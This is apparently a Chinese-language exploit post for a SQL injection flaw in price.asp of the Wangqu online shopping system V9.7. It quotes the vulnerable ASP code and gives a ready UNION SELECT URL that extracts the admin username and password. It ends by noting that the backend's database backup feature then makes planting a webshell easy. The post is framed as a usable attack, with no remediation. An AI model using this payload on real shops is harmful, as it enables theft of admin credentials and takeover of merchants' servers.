网趣网上购物系统时尚版V9.7注入漏洞

网趣网上购物系统官方介绍：

          网趣网上购物系统是一套简单易用、功能强大、用户使用最为广泛的网上购物开店平台,凭借多年的网上购物系统研发经验,软件功能日趋强大与完善、依托庞大的用户使用群体,网趣网上购物系统越来越受到用户的青睐,成为众多用户网上开店首选品牌。

漏洞文件在price.asp，部分代码如下：

<%
       anid=trim(request(“anid”))
       %>
                              <td><br>请选择需要查看报价的类别：
                                <table width=”100%” border=”0″ cellpadding=”0″ cellspacing=”0″ dwcopytype=”CopyTableCell”>
          <tr>
                <td align=center><span>
                 <a href=”price.asp”>全部商品</a> <% set rs=server.CreateObject(“adodb.recordset”)
rs.open “select * from bsort order by anclassidorder asc”,conn,1,1
do while not rs.eof
    response.write “||  <A href=?anid=”&rs(“anclassid”)&”>”&trim(rs(“anclass”))&”</a>  ”
   rs.movenext
loop
rs.close
set rs=Nothing
   %>
                  </span></td>
          </tr>
        </table><%
Const MaxPerPage=20
dim totalPut  
dim CurrentPage
dim TotalPages
dim j
dim sql
if Not isempty(request(“page”)) then
currentPage=Cint(request(“page”))
else
currentPage=1
end if
set rs=server.CreateObject(“adodb.recordset”)
if anid<>”" then
rs.open “select * from products where  anclassid=”&anid&” order by adddate desc”,conn,1,1
else
select case selectm
case “”
rs.open “select * from products order by adddate desc”,conn,1,1
case “0″
rs.open “select * from products order by adddate desc”,conn,1,1
case “shopid”

利用：

price.asp?anid=36%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,admin,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

后台可以备份数据库，前台结合可以轻松拿Webshell。